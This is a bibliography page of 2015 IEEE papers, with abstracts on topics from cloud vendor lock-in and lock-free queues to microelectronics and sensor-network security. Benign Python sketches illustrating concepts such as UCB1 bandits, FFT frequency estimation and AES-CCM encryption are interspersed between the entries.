A. M. Khan, F. Freitag and L. Rodrigues, "Current Trends and Future Directions in Community Edge Clouds," Cloud Networking (CloudNet), 2015 IEEE 4th International Conference on, Niagara Falls, ON, 2015, pp. 239-241. doi: 10.1109/CloudNet.2015.7335315

Abstract: Cloud computing promises access to computing resources that is cost-effective, elastic and easily scalable. With only a few key cloud providers in the field, despite the benefits, there are issues such as vendor lock-in, privacy and control over data. In this paper we focus on alternative models of cloud computing, such as community clouds at the edge, which are built collaboratively using resources contributed by the users, either by relying solely on users' machines or by using them to augment existing cloud infrastructures. We study community network clouds in the context of other initiatives in community cloud computing, mobile cloud computing, social cloud computing, and volunteer computing, and analyse how the context of community networks can support community clouds.

Keywords: cloud computing; mobile computing; volunteer computing; cloud infrastructure; community edge cloud; community network cloud computing; mobile cloud computing; social cloud computing; user machine; volunteer computing; Cloud computing; Computational modeling; Computer architecture; Context; Mobile communication; Resource management; cloud computing; community clouds (ID#: 16-9480)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7335315&isnumber=7335267

 

A. Dabrowski, I. Echizen and E. R. Weippl, "Error-Correcting Codes as Source for Decoding Ambiguity," Security and Privacy Workshops (SPW), 2015 IEEE, San Jose, CA, 2015, pp. 99-105. doi: 10.1109/SPW.2015.28

Abstract: Data decoding, format, or language ambiguities have long been known for amusement purposes. Only recently has it come to attention that they also pose a security risk. In this paper, we present decoder manipulations based on deliberately caused ambiguities that exploit the error correction mechanisms used in several popular applications. This can be used to encode data in multiple formats, or even in the same format with different content. Implementation details of the decoder, or environmental differences, decide which data the decoder locks onto. This leads to different users receiving different content based on a language decoding ambiguity. In general, ambiguity is not desired; however, in special cases it can be particularly harmful. Format dissectors can make wrong decisions: e.g., a firewall scans based on one format, but the user decodes different, harmful content. We demonstrate this behavior with popular barcodes and argue that it can be used to deliver exploits based on the software installed, or to use probabilistic effects to divert a small percentage of users to fraudulent sites.

Keywords: bar codes; decoding; encoding; error correction codes; fraud; security of data; barcodes; data decoding; data encoding; decoder manipulations; error correction mechanisms; error-correcting codes; format dissectors; fraudulent sites; language decoding ambiguity; security risk; Decoding; Error correction codes; Security; Software; Standards; Synchronization; Visualization; Barcode; Error Correcting Codes; LangSec; Language Security; Packet-in-Packet; Protocol decoding ambiguity; QR; Steganography (ID#: 16-9481)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7163213&isnumber=7163193
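
The core observation, that two reasonable decoders can lock onto different payloads from one deliberately ambiguous input, can be miniaturized with a toy repetition code. Both decoder strategies below are hypothetical simplifications of real barcode error correction, chosen only to make the divergence visible.

```python
# Toy demonstration of decoding ambiguity: two plausible decoders for the same
# error-correcting code disagree on a deliberately crafted input. A 3x
# repetition code stands in for the barcode ECC discussed in the paper.

def decode_majority(triples):
    """Decoder A: majority vote across the three copies of each bit."""
    return [1 if sum(t) >= 2 else 0 for t in triples]

def decode_first_copy(triples):
    """Decoder B (hypothetical): trusts the first copy of each bit."""
    return [t[0] for t in triples]

# Crafted stream: each triple is within correction range of *some* codeword,
# but the two strategies disagree about which one.
ambiguous = [(0, 1, 1), (1, 0, 0), (0, 1, 1), (1, 0, 0)]
print(decode_majority(ambiguous))     # [1, 0, 1, 0]
print(decode_first_copy(ambiguous))   # [0, 1, 0, 1] -- different content, same input
```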

 

P. C. Prokopiou, P. E. Caines and A. Mahajan, "An Estimation Based Allocation Rule with Super-Linear Regret and Finite Lock-On Time for Time-Dependent Multi-Armed Bandit Processes," Electrical and Computer Engineering (CCECE), 2015 IEEE 28th Canadian Conference on, Halifax, NS, 2015, pp. 1299-1306. doi: 10.1109/CCECE.2015.7129466

Abstract: The multi-armed bandit (MAB) problem has been an active area of research since the early 1930s. The majority of the literature restricts attention to i.i.d. or Markov reward processes. In this paper, the finite-parameter MAB problem with time-dependent reward processes is investigated. An upper confidence bound (UCB) based index policy, where the index is computed from the maximum-likelihood estimate of the unknown parameter, is proposed. This policy locks on to the optimal arm in finite expected time but has super-linear regret. As an example, the proposed index policy is used for minimizing prediction error when each arm is an auto-regressive moving average (ARMA) process.

Keywords: Markov processes; autoregressive moving average processes; maximum likelihood estimation; resource allocation; ARMA process; Markov reward process; UCB based index policy; auto-regressive moving average process; estimation based allocation rule; finite expected time; finite lock-on time; finite-parameter MAB problem; maximum-likelihood estimation; prediction error minimization; superlinear regret; time-dependent multiarmed bandit process; time-dependent reward process; upper confidence bound based index policy; Computers; Indexes; Markov processes; Maximum likelihood estimation; Resource management; Technological innovation (ID#: 16-9482)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7129466&isnumber=7129089
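
For readers unfamiliar with index policies, the classical UCB1 rule for i.i.d. arms conveys the basic mechanism that the paper's estimation-based index generalizes to time-dependent (e.g. ARMA) reward processes: each arm's index is its empirical mean plus an exploration bonus that shrinks as the arm is sampled. The sketch below is the textbook baseline, not the authors' policy.

```python
# Baseline UCB1 index policy for i.i.d. reward arms -- the classical scheme the
# abstract's estimation-based index builds on, shown here for orientation only.
import math
import random

def ucb1(pull, n_arms: int, horizon: int):
    counts = [0] * n_arms
    means = [0.0] * n_arms
    for t in range(1, horizon + 1):
        if t <= n_arms:
            arm = t - 1                       # initialise: pull each arm once
        else:
            # Index = empirical mean + exploration bonus; pick the largest.
            arm = max(range(n_arms),
                      key=lambda a: means[a] + math.sqrt(2 * math.log(t) / counts[a]))
        r = pull(arm)
        counts[arm] += 1
        means[arm] += (r - means[arm]) / counts[arm]   # incremental mean update
    return counts

# Toy Bernoulli bandit: arm 1 is best, and UCB1 locks onto it.
probs = [0.3, 0.7, 0.5]
counts = ucb1(lambda a: 1.0 if random.random() < probs[a] else 0.0, 3, 5000)
print(counts)   # pull counts concentrate on arm 1
```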

 

P. Lindgren, M. Lindner, A. Lindner, D. Pereira and L. M. Pinho, "RTFM-Core: Language and Implementation," Industrial Electronics and Applications (ICIEA), 2015 IEEE 10th Conference on, Auckland, 2015, pp. 990-995. doi: 10.1109/ICIEA.2015.7334252

Abstract: Robustness, real-time properties and resource efficiency are key requirements for embedded devices of the CPS/IoT era. In this paper we propose a language approach, RTFM-core, and show its potential to facilitate the development process and provide highly efficient and statically verifiable implementations. Our programming model is reactive, based on the familiar notions of concurrent tasks and (single-unit) resources. The language is kept minimalistic, capturing the static task, communication and resource structure of the system. Since C source can be arbitrarily embedded in the model and/or externally referenced, the instep to mainstream development is minimal, and a smooth transition of legacy code is possible. A prototype compiler implementation for RTFM-core is presented. The compiler generates C code that, compiled together with the RTFM-kernel primitives, runs on bare metal. The RTFM-kernel guarantees deadlock-free execution and efficiently exploits the underlying interrupt hardware for static priority scheduling and resource management under the Stack Resource Policy. This allows a plethora of well-known methods for static verification (response time analysis, stack memory analysis, etc.) to be readily applied. The proposed language and supporting tool-chain are demonstrated by showing the complete process from RTFM-core source code to bare-metal executables for a lightweight ARM Cortex-M3 target.

Keywords: C language; operating system kernels; program compilers; resource allocation; scheduling; ARM-Cortex M3 target; C-code output generation; C-source; RTFM-core language; RTFM-core source code; RTFM-kernel primitives; bare metal executables; deadlock-lock free execution; interrupt hardware; legacy code transition; prototype compiler implementation; reactive programming model; resource management; stack resource policy; static priority scheduling; static verification; Grammar; Hardware; Instruction sets; Job shop scheduling; Metals; Programming; Synchronization (ID#: 16-9483)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7334252&isnumber=7334072

 

P. Lindgren, M. Lindner, A. Lindner, D. Pereira and L. M. Pinho, "Well-formed Control Flow for Critical Sections in RTFM-core," Industrial Informatics (INDIN), 2015 IEEE 13th International Conference on, Cambridge, 2015, pp. 1438-1445. doi: 10.1109/INDIN.2015.7281944

Abstract: The mainstream of embedded software development today is dominated by C programming. To aid development, hardware abstractions, libraries, kernels and lightweight operating systems are commonplace. Such kernels and operating systems typically impose a thread-based abstraction of concurrency. However, thread-based programming is in general hard, plagued by race conditions and deadlocks. In this paper we take an alternative outset in terms of a language abstraction, RTFM-core, where the system is modelled directly in terms of tasks and resources. In compliance with the Stack Resource Policy (SRP) model, the language enforces (well-formed) LIFO nesting of claimed resources, so SRP-based analysis and scheduling can be readily applied. For execution on bare-metal single-core architectures, the rtfm-core compiler performs SRP analysis on the model and renders an executable that is deadlock free and (through RTFM-kernel primitives) exploits the underlying interrupt hardware for efficient scheduling. The RTFM-core language embeds C code and links to C object files and libraries, and is thus applicable to the mainstream of embedded development. However, while the language enforces well-formed resource management, control flow in the embedded C code may violate the LIFO nesting requirement. In this paper we address this issue by lifting a subset of C into the RTFM-core language, allowing arbitrary control flow at the model level. In this way well-formed LIFO nesting can be enforced, and models are ensured to be correct by construction. We demonstrate the feasibility by means of a prototype implementation in the rtfm-core compiler. Additionally, we develop a set of running examples and show in detail how control flow is handled at compile time and during run-time execution.

Keywords: C language; embedded systems; program compilers; program control structures; scheduling; C programming; C-object files; C-object libraries; LIFO nesting requirement; RTFM-core compiler; SRP model; bare-metal single core architectures; control flow; embedded C-code; embedded software development; general thread based programming; language abstraction; last-in-first-out nesting requirement; lightweight operating systems; resource management; stack resource policy model; thread based abstraction; Concurrent computing; Hardware; Kernel; Libraries; Programming; Switches; Synchronization (ID#: 16-9484)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7281944&isnumber=7281697
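
The well-formedness property at the heart of both RTFM-core papers, LIFO nesting of resource claims as required by the Stack Resource Policy, amounts to a simple stack discipline that a compiler pass can check. The sketch below uses a made-up "claim R"/"release R" event format standing in for the compiler's internal representation.

```python
# Hedged sketch of a well-formedness check in the spirit of the paper:
# verifying that resource claims along a control-flow path are LIFO-nested,
# as the Stack Resource Policy requires. The event format is hypothetical.

def is_lifo_nested(events: list[str]) -> bool:
    stack = []
    for ev in events:
        op, res = ev.split()
        if op == "claim":
            if res in stack:          # re-claiming a held resource: reject
                return False
            stack.append(res)
        elif op == "release":
            if not stack or stack[-1] != res:
                return False          # releases must match the innermost claim
            stack.pop()
    return not stack                  # everything claimed must be released

print(is_lifo_nested(["claim A", "claim B", "release B", "release A"]))  # True
print(is_lifo_nested(["claim A", "claim B", "release A", "release B"]))  # False
```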

 

Bowu Zhang, Jinho Hwang, L. Ma and T. Wood, "Towards Security-Aware Virtual Server Migration Optimization to the Cloud," Autonomic Computing (ICAC), 2015 IEEE International Conference on, Grenoble, 2015, pp. 71-80. doi: 10.1109/ICAC.2015.45

Abstract: Cloud computing, featuring shared servers and location-independent services, has been widely adopted by various businesses to increase computing efficiency and reduce operational costs. Despite significant benefits and interest, enterprises have a hard time deciding whether or not to migrate thousands of servers into the cloud, for reasons such as the lack of holistic migration (planning) tools, concerns over data security, and cloud vendor lock-in. In particular, cloud security has become the major concern for decision makers, due to an inherent weakness of virtualization: the fact that the cloud allows multiple users to share resources through Internet-facing interfaces can easily be taken advantage of by hackers. Therefore, setting up a secure environment for resource migration becomes the top priority for both enterprises and cloud providers. To achieve the goal of security, security policies such as firewalls and access control have been widely adopted, leading to significant cost as additional resources need to be employed. In this paper, we address the challenge of security-aware virtual server migration and propose a migration strategy that minimizes the migration cost while meeting the security needs of enterprises. We prove that the proposed security-aware cost minimization problem is NP-hard and that our solution achieves an approximation factor of 2. We perform an extensive simulation study to evaluate the performance of the proposed solution under various settings. Our simulation results demonstrate that our approach can save 53% of the moving cost for a single-enterprise case, and 66% for a multiple-enterprise case, compared to a random migration strategy.

Keywords: cloud computing; cost reduction; resource allocation; security of data; virtualisation; Internet-facing interfaces; NP hard problem; cloud computing; cloud security; cloud vendor lock-in; data security; moving cost savings; resource migration; resource sharing; security policy; security-aware cost minimization problem; security-aware virtual server migration optimization; virtualization; Approximation algorithms; Approximation methods; Cloud computing; Clustering algorithms; Home appliances; Security; Servers; Cloud Computing; Cloud Migration; Cloud Security; Cost Minimization (ID#: 16-9485)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7266936&isnumber=7266915

 

A. Atalar, A. Gidenstam, P. Renaud-Goud and P. Tsigas, "Modeling Energy Consumption of Lock-Free Queue Implementations," Parallel and Distributed Processing Symposium (IPDPS), 2015 IEEE International, Hyderabad, 2015, pp. 229-238. doi: 10.1109/IPDPS.2015.31

Abstract: This paper considers the problem of modelling the energy behaviour of lock-free concurrent queue data structures. Our main contribution is a way to model the energy behaviour of lock-free queue implementations and of parallel applications that use them. Focusing on steady-state behaviour, we decompose energy behaviour into throughput and power dissipation, which can be modeled separately and later recombined into several useful metrics, such as energy per operation. Based on our models, instantiated from synthetic benchmark data, and using only a small amount of additional application-specific information, energy and throughput predictions can be made for parallel applications that use the respective data structure implementation. To model throughput, we propose a generic model for lock-free queue throughput behaviour, based on a combination of the dequeuers' and the enqueuers' throughput. To model power dissipation, we split the contributions from the various computer components into static, activation and dynamic parts, where only the dynamic part depends on the actual instructions being executed. To instantiate the models, a synthetic benchmark explores each queue implementation over the dimensions of processor frequency and number of threads. Finally, we show how to make predictions of application throughput and power dissipation for a parallel application using a lock-free queue, requiring only a limited amount of information about the application work done between queue operations. Our case study on a Mandelbrot application shows convincing prediction results.

Keywords: data structures; energy consumption; parallel processing; power aware computing; queueing theory; Mandelbrot application; computer components; data structure implementation; dynamic parts; energy behavior; energy consumption modeling; lock-free concurrent queue data structures; lock-free queue implementations; lock-free queue throughput behavior; parallel applications; power dissipation; steady state behavior; synthetic benchmark data; Benchmark testing; Computational modeling; Data models; Data structures; Instruction sets; Power dissipation; Throughput; analysis; concurrent data structures; energy; lock-free; modeling; power; queue; throughput (ID#: 16-9486)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7161512&isnumber=7161257
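
The paper's recombination step is arithmetically simple and worth making concrete: once throughput and the static, activation, and dynamic power parts are modeled separately, energy per operation is total power divided by throughput. The numbers in the sketch are placeholders, not measured values from the paper.

```python
# Minimal instance of the decomposition the abstract describes: power modeled
# as static + activation + dynamic parts, throughput modeled separately, the
# two recombined into energy per operation. All values below are placeholders.

def energy_per_op(throughput_ops_per_s: float,
                  p_static_w: float, p_active_w: float, p_dynamic_w: float) -> float:
    """Energy per queue operation in joules: total power divided by throughput."""
    total_power = p_static_w + p_active_w + p_dynamic_w
    return total_power / throughput_ops_per_s

# e.g. 40 W static, 15 W activation, 10 W dynamic at 20 M ops/s:
print(energy_per_op(20e6, 40.0, 15.0, 10.0))   # 3.25e-06 J per operation
```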

 

S. Kolb, J. Lenhard and G. Wirtz, "Application Migration Effort in the Cloud - The Case of Cloud Platforms," Cloud Computing (CLOUD), 2015 IEEE 8th International Conference on, New York City, NY, 2015, pp. 41-48. doi: 10.1109/CLOUD.2015.16

Abstract: Over the last few years, the utilization of cloud resources has been steadily rising, and an increasing number of enterprises are moving applications to the cloud. A leading trend is the adoption of Platform as a Service to support rapid application deployment. By providing a managed environment, cloud platforms take away much of the complex configuration effort required to build scalable applications. However, application migrations to and between clouds cost development effort and open up new risks of vendor lock-in. This is problematic because frequent migrations may be necessary in the dynamic and fast-changing cloud market. So far, the effort of application migration in PaaS environments, and the typical issues experienced in this task, are poorly understood. To improve this situation, we present a cloud-to-cloud migration of a real-world application to seven representative cloud platforms. In this case study, we analyze the feasibility of the migrations in terms of portability and the effort of the migrations. We present a Docker-based deployment system that provides the ability to perform isolated and reproducible measurements of deployments to platform vendors, thus enabling the comparison of platforms for a particular application. Using this system, the study identifies key problems during migrations and quantifies these differences with distinctive metrics.

Keywords: cloud computing; software cost estimation; software metrics; Docker-based deployment system; PaaS; Platform as a Service; application migration; cloud cost development effort; cloud market; cloud resource utilisation; cloud-to-cloud migration; complex configuration; distinctive metrics; portability; rapid application deployment; scalable applications; Automation; Containers; Measurement; Pricing; Rails; Case Study; Cloud Computing; Metrics; Migration; Platform as a Service; Portability (ID#: 16-9487)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7214026&isnumber=7212169

 

A. Del Giudice, G. Graditi, A. Pietrosanto and V. Paciello, "Power Quality in Smart Distribution Grids," Measurements & Networking (M&N), 2015 IEEE International Workshop on, Coimbra, 2015, pp. 1-6. doi: 10.1109/IWMN.2015.7322967

Abstract: Demand Side Management requires both an adequate architecture to observe and control the status of the power grid and precise, real-time measurements on which to rely. In the presence of frequency fluctuations, precision is no longer guaranteed, so, without adding more hardware, the authors exploit FFT interpolation to estimate the real frequency of electrical signals. The discovery phase is followed by the measurement phase, in which a low-cost Smart Meter computes the specified metrics. Finally, a comparison between measurements taken by a reference instrument and by the proposed meter is reported.

Keywords: distribution networks; fast Fourier transforms; interpolation; power supply quality; power system measurement; smart meters; FFT interpolation; electrical signal frequency; frequency fluctuations; power grid; power quality; smart distribution grids; smart meter; Current measurement; Frequency estimation; Harmonic analysis; Phasor measurement units; Power measurement; Voltage measurement; Demand Side Management; FFT; Frequency lock; Power Quality; Smart Grid; Smart Metering (ID#: 16-9488)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7322967&isnumber=7322959
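
FFT-based frequency estimation with peak interpolation is a standard technique; since the abstract does not give the authors' exact formula, the sketch below uses parabolic interpolation on the log-magnitude spectrum around the coarse peak bin to recover a mains frequency to well within one FFT bin.

```python
# Sketch of FFT-based frequency estimation with peak interpolation -- the
# generic technique the abstract refers to. The parabolic-interpolation variant
# used here is an assumption; the authors' exact formula is not specified.
import numpy as np

def estimate_frequency(signal: np.ndarray, fs: float) -> float:
    windowed = signal * np.hanning(len(signal))   # reduce spectral leakage
    spectrum = np.abs(np.fft.rfft(windowed))
    k = int(np.argmax(spectrum))                  # coarse peak bin
    # Parabolic interpolation over the peak and its two neighbours gives a
    # sub-bin correction delta in [-0.5, 0.5].
    a, b, c = np.log(spectrum[k - 1 : k + 2])
    delta = 0.5 * (a - c) / (a - 2 * b + c)
    return (k + delta) * fs / len(signal)

fs = 3200.0                                       # 64 samples per 50 Hz cycle
t = np.arange(1024) / fs
grid = np.sin(2 * np.pi * 49.87 * t)              # mains signal drifting off 50 Hz
print(estimate_frequency(grid, fs))               # ~49.87, well inside one 3.125 Hz bin
```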

 

J. Dworak and A. Crouch, "A Call to Action: Securing IEEE 1687 and the Need for an IEEE Test Security Standard," VLSI Test Symposium (VTS), 2015 IEEE 33rd, Napa, CA, 2015, pp. 1-4. doi: 10.1109/VTS.2015.7116256

Abstract: Today's chips often contain a wealth of embedded instruments, including sensors, hardware monitors, built-in self-test (BIST) engines, etc. They may process sensitive data that requires encryption or obfuscation and may contain encryption keys and ChipIDs. Unfortunately, unauthorized access to internal registers or instruments through test and debug circuitry can turn design for testability (DFT) logic into a backdoor for data theft, reverse engineering, counterfeiting, and denial-of-service attacks. A compromised chip also poses a security threat to any board or system that includes that chip, and boards have their own security issues. We will provide an overview of some chip and board security concerns as they relate to DFT hardware and will briefly review several ways in which the new IEEE 1687 standard can be made more secure. We will then discuss the need for an IEEE Security Standard that can provide solutions and metrics for appropriate security matched to the needs of a real-world environment.

Keywords: built-in self test; cryptography; design for testability; reverse engineering; BIST; ChipID; DFT hardware; DFT logic; IEEE 1687;IEEE test security standard; built-in self-test; data theft; denial-of-service attacks; design for testability; embedded instruments; encryption keys; hardware monitors; internal registers; reverse engineering; Encryption; Instruments; Microprogramming; Ports (Computers);Registers; Standards; BIST; DFT; IEEE Standard; IJTAG; JTAG; LSIB; P1687; lock; scan; security; trap (ID#: 16-9489)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7116256&isnumber=7116233

 

Lei Yuan, Hong Chen, Bingtao Ren and Haiyan Zhao, "Model Predictive Slip Control for Electric Vehicle with Four In-Wheel Motors," Control Conference (CCC), 2015 34th Chinese, Hangzhou, 2015, pp. 7895-7900. doi: 10.1109/ChiCC.2015.7260894

Abstract: In order to solve the problem that electric vehicle wheels may lock up when braking, or spin out when accelerating, on low-friction-coefficient (low-μ) roads, this paper presents a nonlinear model predictive controller for slip control of an electric vehicle equipped with four in-wheel motors. The advantage of the proposed nonlinear model predictive control (NMPC) based slip controller is that it can act not only as an anti-lock braking system (ABS), by preventing the tires from locking up when braking, but also as a traction control system (TCS), by preventing the tires from spinning out when accelerating. Besides, the proposed slip controller is capable of assisting the hydraulic brake system of the vehicle by automatically distributing the braking torque between the wheels using the available braking torque of the in-wheel motors. In this regard, the proposed NMPC slip controller guarantees the optimal traction or braking torque on each wheel under low-μ road conditions by individually controlling the slip ratio of each tire within the stable zone with a much faster response time, while considering actuator limitations, wheel slip constraints and performance metrics. The performance of the proposed controller is confirmed by running the electric vehicle model with four individually driven in-wheel motors, built in AMESim, through several test maneuvers in the co-simulation environment of AMESim and Simulink.

Keywords: braking; electric vehicles; nonlinear control systems; optimal control; predictive control; torque control; traction; ABS; AMESim; NMPC slip controller; TCS; actuator limitations; anti-lock braking system; braking torque; electric vehicle wheels; hydraulic brake system; in-wheel motors; low-friction coefficient roads; nonlinear model predictive control based slip controller; optimal traction; slip ratio; traction control system; wheel slip constraints; Acceleration; Roads; Tires; Torque; Traction motors; Vehicles; Wheels; Electric vehicle; NMPC; co-simulation; constraint; in-wheel motor; slip control (ID#: 16-9490)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7260894&isnumber=7259602
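
The quantity the NMPC controller regulates per wheel is the longitudinal slip ratio. A minimal illustration of computing it, with a naive stable-zone check in the spirit of ABS/TCS, follows; the 0.15 bound is a typical textbook value, not taken from the paper.

```python
# Illustrative computation of the longitudinal slip ratio regulated by the
# paper's NMPC controller, with a naive threshold check in the spirit of ABS.
# The stable-zone bound (~0.15) is a common textbook value, not the paper's.

def slip_ratio(v_vehicle: float, omega_wheel: float, r_wheel: float) -> float:
    """Braking slip: positive when the wheel turns slower than the body moves."""
    v_wheel = omega_wheel * r_wheel
    return (v_vehicle - v_wheel) / max(v_vehicle, 1e-3)   # guard near standstill

v = 20.0            # vehicle speed, m/s
omega = 55.0        # wheel angular speed, rad/s
r = 0.3             # wheel radius, m
lam = slip_ratio(v, omega, r)
print(f"slip ratio = {lam:.3f}")        # 0.175 here
if lam > 0.15:      # outside the assumed stable zone: back off braking torque
    print("reduce braking torque on this wheel")
```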

 

A. Ashraf, K. O. Davis, K. Ogutman, W. V. Schoenfeld and M. D. Eisaman, "Hyperspectral Laser Beam Induced Current System for Solar Cell Characterization," Photovoltaic Specialist Conference (PVSC), 2015 IEEE 42nd, New Orleans, LA, 2015, pp. 1-4. doi: 10.1109/PVSC.2015.7356129

Abstract: We introduce a novel hyperspectral laser beam induced current (LBIC) system that uses a supercontinuum laser tunable from 400 nm to 1200 nm with a diffraction-limited spot size. The solar cell is light biased while simultaneously being illuminated by a chopped laser beam at a given wavelength. Current-voltage measurements, performed by measuring the current perturbation due to the laser using a lock-in amplifier, allow us to extract performance metrics at a specific lateral position and depth (by tuning the wavelength of the laser) while the device is at operating conditions. These parameters are simultaneously compared to material deformations as determined from the doping density and the built-in voltage. Concurrently, we also probe lateral recombination variation by measuring the activation energy, thereby providing a comprehensive and unique analysis.

Keywords: OBIC; solar cells; supercontinuum generation; activation energy; chopped laser beam; diffracted limited spot size; doping density; hyperspectral laser beam induced current system; lateral recombination variation; lock-in amplifier; solar cell characterization; supercontinuum laser; Current measurement; Laser beams; Measurement by laser beam; Photovoltaic cells; Resistance; Temperature measurement; Wavelength measurement; hyperspectral; lbic; photovoltaic (ID#: 16-9491)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7356129&isnumber=7355590
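
The lock-in measurement the abstract relies on can be sketched digitally: multiply the chopped photocurrent by in-phase and quadrature references at the chopping frequency, low-pass the products (here, a simple mean), and read off amplitude and phase. All parameters below are illustrative, not the instrument's.

```python
# Digital lock-in detection sketch -- the generic principle behind the LBIC
# measurement, not the instrument's implementation. Parameters are made up.
import numpy as np

def lock_in(signal: np.ndarray, fs: float, f_ref: float) -> tuple[float, float]:
    t = np.arange(len(signal)) / fs
    x = np.mean(signal * np.cos(2 * np.pi * f_ref * t))   # in-phase component
    y = np.mean(signal * np.sin(2 * np.pi * f_ref * t))   # quadrature component
    amplitude = 2.0 * np.hypot(x, y)
    phase = np.arctan2(y, x)
    return amplitude, phase

fs, f_chop = 100_000.0, 1_000.0
t = np.arange(100_000) / fs          # one second of samples
noisy = 5e-6 * np.cos(2 * np.pi * f_chop * t) + 1e-4 * np.random.randn(t.size)
amp, _ = lock_in(noisy, fs, f_chop)
print(amp)                           # ~5e-6: the chopped signal recovered from noise
```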


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.

Microelectronics Security 2015

 

 
SoS Logo

Microelectronics Security 2015

 

Microelectronics is at the center of the IT world. Its security—provenance, integrity of manufacture, and capacity for providing embedded security—is both an opportunity and a problem for cybersecurity research. For the Science of Security community, microelectronic security is a constituent component of resiliency, composability, and predictive metrics. The work cited here was presented in 2015.


Solic, K.; Velki, T.; Galba, T., "Empirical Study on ICT System's Users' Risky Behavior and Security Awareness," in Information and Communication Technology, Electronics and Microelectronics (MIPRO), 2015 38th International Convention on, pp. 1356-1359, 25-29 May 2015. doi: 10.1109/MIPRO.2015.7160485

Abstract: In this study the authors gathered information on ICT users from different areas in Croatia, with different knowledge, experience, workplace, age and gender backgrounds, in order to examine the current situation in the Republic of Croatia (n=701) regarding ICT users' potentially risky behavior and security awareness. To gather the desired data, the validated Users' Information Security Awareness Questionnaire (UISAQ) was used. The analysis outcomes represent results for ICT users in Croatia across 6 subareas (mean of items): Usual risky behavior (x1=4.52), Personal computer maintenance (x2=3.18), Borrowing access data (x3=4.74), Criticism on security in communications (x4=3.48), Fear of losing data (x5=2.06), Rating importance of backup (x6=4.18). In this work a comparison between users regarding demographic variables (age, gender, professional qualification, occupation, managing job position and institution category) is given. Perhaps the most interesting finding is the percentage of questioned users who revealed the password for their professional e-mail system (28.8%). This should alert security experts and security managers in enterprises, government institutions, and also schools and faculties. The results of this study should be used to develop solutions and induce actions aiming to increase awareness among Internet users of information security and privacy issues.

Keywords: Internet; data privacy; electronic mail; risk analysis; security of data; ICT system; Internet users; Republic of Croatia; UISAQ; age; enterprises; experience; gender background; government institutions; institution category; job position; knowledge; occupation; personal computer maintenance; privacy issues; professional e-mail system; professional qualification; security awareness; security experts; security managers; user information security awareness questionnaire; user risky behavior; working place; Electronic mail; Government; Information security; Microcomputers; Phase change materials; Qualifications (ID#: 16-9325)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160485&isnumber=7160221

 

Sparrow, R.D.; Adekunle, A.A.; Berry, R.J.; Farnish, R.J., "Study of Two Security Constructs on Throughput for Wireless Sensor Multi-Hop Networks," in Information and Communication Technology, Electronics and Microelectronics (MIPRO), 2015 38th International Convention on, pp. 1302-1307, 25-29 May 2015. doi: 10.1109/MIPRO.2015.7160476

Abstract: With the interconnection of devices becoming more widespread in society (e.g. the Internet of Things), networked devices are used in a range of environments, from smart grids to smart buildings. Wireless Sensor Networks (WSN) have commonly been utilised as a method of monitoring a set of processes. In control networks, WSN have been deployed to perform a variety of tasks (i.e. to collate and distribute data from an event to an end device). However, the nature of the wireless broadcast medium enables attackers to conduct active and passive attacks. Cryptography is selected as a countermeasure to overcome these security vulnerabilities; however, a drawback of using cryptography is reduced throughput. This paper investigates the impact of two software authenticated encryption with associated data (AEAD) security constructs on the packet throughput of multiple-hop WSN: counter with cipher block chaining message authentication code (CCM) and TinyAEAD. Experiments were conducted in a simulated environment. A case scenario is also presented to emphasise the impact in a real-world context. Results observed indicate that the security constructs examined in this paper affect the average throughput measurements up to three hops.

Keywords: Internet of Things; cryptography; telecommunication security; wireless sensor networks; AEAD security ;Internet of Things; WSN; cipher block chaining; control networks WSN; cryptography; device interconnection; end device; message authentication code; networked devices; passive attacks; security construction; security vulnerabilities; simulated environment; software authenticated encryption with associated data; wireless broadcast medium; wireless sensor multihop networks; Communication system security; Mathematical model; Security; Simulation; Throughput; Wireless communication; Wireless sensor networks; AEAD constructs; Networked Control Systems; Wireless Sensor Networks (ID#: 16-9326)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160476&isnumber=7160221
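
Of the two constructs benchmarked, CCM (counter-mode encryption with CBC-MAC authentication) is widely available off the shelf; the snippet below shows it via the Python cryptography package, with the routing header carried as authenticated associated data. TinyAEAD has no commonly packaged Python binding, so only CCM is illustrated.

```python
# Minimal AES-CCM example using the "cryptography" package, to make the CCM
# construct benchmarked in the paper concrete. Payload and header contents are
# made-up sensor-network placeholders.
from cryptography.hazmat.primitives.ciphers.aead import AESCCM
import os

key = AESCCM.generate_key(bit_length=128)
aead = AESCCM(key)                     # default 16-byte authentication tag
nonce = os.urandom(13)                 # CCM accepts 7-13 byte nonces

reading = b"node-17:temp=21.4C"        # sensor payload to encrypt + authenticate
header = b"seq=42"                     # routed in the clear, but still authenticated
ciphertext = aead.encrypt(nonce, reading, header)

# Any tampering with ciphertext, nonce, or header raises InvalidTag on decrypt.
assert aead.decrypt(nonce, ciphertext, header) == reading
```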

 

Ivantsiv, R.-A.; Khanas, Y., "Methods Of Information Security Based Cryptographic Transformations Matrix Noise Immunity," in Experience of Designing and Application of CAD Systems in Microelectronics (CADSM), 2015 13th International Conference The, pp. 218-220, 24-27 Feb. 2015. doi: 10.1109/CADSM.2015.7230840

Abstract: This paper describes the main methods for ensuring the integrity of information systems; software implementation of these methods will create a security system for information structures. The focus is on matrix-algebra transformation algorithms and the investigation of their modifications and improvements.

Keywords: cryptography; matrix algebra; information security based cryptographic transformation matrix noise immunity methods; information structures; information system integrity; security system; software implementation; transformation matrix algebra; Cryptography; Distortion; Encoding; Information security; Mathematical model; Matrices; Resistance (ID#: 16-9327)

